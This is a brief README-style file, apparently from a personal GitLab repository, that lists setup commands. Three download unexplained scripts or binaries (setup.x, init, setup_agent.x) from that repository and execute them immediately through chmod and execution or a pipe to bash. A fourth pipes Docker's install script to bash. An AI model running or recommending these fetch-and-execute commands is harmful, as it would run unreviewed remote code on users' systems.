# public
wget https://gitlab.com/lotte6/public/-/raw/master/setup.x && chmod +x setup.x &&
./setup.x

curl -o- https://gitlab.com/lotte6/public/-/raw/master/init |bash

yum install -y wget && wget https://gitlab.com/lotte6/public/-/raw/master/setup_agent.x && chmod +x setup_agent.x && ./setup_agent.x

curl -fsSL https://get.docker.com | bash
